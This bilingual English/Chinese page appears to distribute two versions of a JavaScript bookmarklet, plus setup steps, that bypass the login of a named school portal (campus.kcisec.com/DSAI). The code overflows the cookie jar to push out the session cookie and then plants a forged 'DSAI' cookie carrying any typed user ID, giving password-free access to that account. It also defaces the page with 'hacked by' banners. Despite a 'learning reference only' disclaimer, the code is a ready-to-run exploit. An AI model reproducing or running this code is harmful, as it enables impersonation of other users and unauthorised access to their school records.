To use this program, create a bookmark in your browser and enter:
如需使用该软件，在浏览器中创建一个新书签，然后键入：

javascript:(function(){/*学武系统hacker ver1.7 by Idad Wind*/var hacker_debug=false;if($('#hacked').length>0){alert('This page had already been hacked! Do not run twice!');}var current_url=window.location.href;/*Debug log*/function log(info){hacker_debug&&console.log(info);}/*Details*/if(current_url.startsWith('http://campus.kcisec.com/DSAI/Account/LogIn')||current_url.startsWith('http://campus.kcisec.com/DSAI/Account/Login')||current_url.startsWith('https://campus.kcisec.com/DSAI/Account/LogIn')||current_url.startsWith('https://campus.kcisec.com/DSAI/Account/Login')){var div=document.getElementById("FormLogin").children[0].children[8];div.style.textDecoration='line-through';div.innerHTML+='<div style="float:left;white-space:normal;color:red">No need to enter password! '+'This website had been hacked by 学武系统hacker</div>';}else{document.getElementsByClassName("main_logout")[0].innerText="hacked by 学武系统hacker";}document.getElementsByClassName("ui-input-text ui-body-inherit ui-corner-all ui-shadow-inset")[1].innerHTML="<div style=\"color:red\">This program is for learning reference only, rather than abusing, or you'll take the risk!</div>";document.getElementById("UserId").addEventListener("keyup",function(event){if(event.keyCode===13){event.preventDefault();$("[name=btn_s]").tap();}});/*Hacking function*/function hack(id){log("Hacking "+id);var date=new Date();date.setTime(date.getTime()+3600000);/*Delete all cookies(uses overflow to delete httpOnly cookies)*/log("Attacking session cookie");for(let i=0;i<100;i++)log("Creating spam cookie: "+(document.cookie='cookie'+i+'='+i+';expires='+date.toUTCString()));var oldest_time=new Date(0);/*Delete spam cookies after attack*/for(let i=0;i<100;i++)document.cookie='cookie'+i+'=0;expires='+oldest_time.toUTCString();log('Spam cookies are been deleted');/*Create fake login cookie*/document.cookie="DSAI="+$("#UserId").val()+";expires="+date.toGMTString()+";path=/";/*Get hacked session*/log("Detention API returned:");fetch(window.location.origin+'/DSAI/Query/Form_ListDetention?strKeyWord1=').then(response=>response.json()).then(data=>log(data)).catch(error=>(function(){console.error(error);if(error.name=='SyntaxError'){alert(id+' seems not exist. Check your spelling.');return;}alert("Error while hacking "+id+"! "+error);successed=false;}()))}/*Off event of submit button*/$("[name=btn_s]").off("tap");/*On new tap event of submit button*/$("[name=btn_s]").on("tap",function(){if($("#UserId").val()==''){alert('Username field cannot be empty!');return;}hack($("#UserId").val());log("done hacking, redirecting to /DSAI/Home");window.location.href="/DSAI/Home";});$('body').append('<div id="hacked"></div>');}())

into the URL field.
至URL

The lighten edition of it is given:
该程序的简化版：

javascript:(function(){/*学武系统hacker lighten edition by Idad Wind*/document.getElementsByClassName("ui-input-text ui-body-inherit ui-corner-all ui-shadow-inset")[1].style.display='none';document.getElementById("UserId").addEventListener("keyup",function(event){if(event.keyCode===13){event.preventDefault();$("[name=btn_s]").tap();}});$("[name=btn_s]").off("tap");$("[name=btn_s]").on("tap",function(){var date=new Date();date.setTime(date.getTime()+3600000);for(let i=0;i<100;i++)document.cookie='cookie'+i+'='+i+';expires='+date.toUTCString();var oldest_time=new Date(0);for(let i=0;i<100;i++)document.cookie='cookie'+i+'=0;expires='+oldest_time.toUTCString();document.cookie="DSAI="+$("#UserId").val()+";expires="+date.toGMTString()+";path=/";fetch(window.location.origin+'/DSAI/Query/Form_ListDetention?strKeyWord1=').then(response=>response.json()).catch(error=>console.error(error));window.location.href="/DSAI/Home";});}())

Detail:
具体操作：

1. Bookmark current website | 收藏当前网址
2. Find bookmark | 找到收藏
3. Right click -> "Edit" -> "URL" -> enter the program code | 右键点击->"编辑"->"URL"->将程序代码输入

Copyright (C) 2023 Idad Wind
All rights reserved.
